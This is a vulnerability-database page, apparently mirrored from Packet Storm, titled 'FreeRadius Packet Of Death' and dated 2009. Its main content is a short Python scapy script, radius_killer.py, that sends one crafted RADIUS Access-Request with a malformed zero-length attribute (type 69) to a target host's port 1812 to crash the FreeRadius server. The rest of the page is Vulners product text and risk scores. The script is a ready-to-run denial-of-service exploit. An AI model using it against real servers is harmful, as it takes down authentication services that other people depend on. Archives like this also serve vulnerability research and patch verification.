Lucene search
K

FreeRadius Packet Of Death

🗓️ 11 Sep 2009 00:00:00Reported by Matthew GillespieType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

FreeRadius Packet Of Death exploi

Related
Code
`#!/usr/bin/env python  
# FreeRadius Packet Of Death  
# Matthew Gillespie 2009-09-11  
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py  
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/  
  
import sys  
from scapy.all import IP,UDP,send,Radius,RadiusAttr  
  
if len(sys.argv) != 2:  
print "Usage: radius_killer.py <radiushost>\n"  
sys.exit(1)  
  
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \  
Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \  
RadiusAttr(type=69,value="",len=2)  
  
send(PoD)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2009 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.17898
34